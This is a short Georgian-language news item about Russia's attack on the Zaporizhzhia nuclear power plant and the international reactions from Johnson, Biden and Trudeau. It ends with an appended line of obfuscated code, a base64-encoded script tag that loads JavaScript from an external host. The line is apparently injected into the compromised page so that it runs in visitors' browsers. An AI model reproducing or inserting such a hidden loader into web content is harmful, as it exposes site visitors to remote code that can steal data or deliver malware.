celsiusi
ავერსი შნაიდერი
ზაპოროჟიეს ატომურ ელექტროსადგურზე რუსეთის მიერ განხორციელებულ იერიშს უკვე მოჰყვა საერთაშორისო გამოხმაურებები.
 
გაეროს უშიშროების საბჭოს საგანგებო სხდომას მოიწვევს დიდი ბრიტანეთის პრემიერ-მინისტრი. ბორის ჯონსონი უკრაინის პრეზიდენტს ცოტახნის წინ ესაუბრა და რუსეთს ატომურ ელექტრო სადგურზე თავდასხმის დაუყოვნებლივ შეწყვეტისკენ მოუწოდა.
 
მოვლენებს აკვირდება თეთრი სახლიც. გამთენიისას სატელეფონო საუბარი შედგა ჯო ბაიდენსა და ვოლოდიმირ ზელენსკის შორის. ბაიდენი რუსულ არმიას მოუწოდებს შეწყვიტოს იერიში ატომურ ელექტრო სადგურზე.
ზელენსკის ესაუბრა კანადის პრემიერ-მინისტრიც. რუსეთის ეს მიუღებელი თავდასხმები უნდა შეწყდეს - წერს ჯასტინ ტრიუდო ტვიტერზე.
 
 
762
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");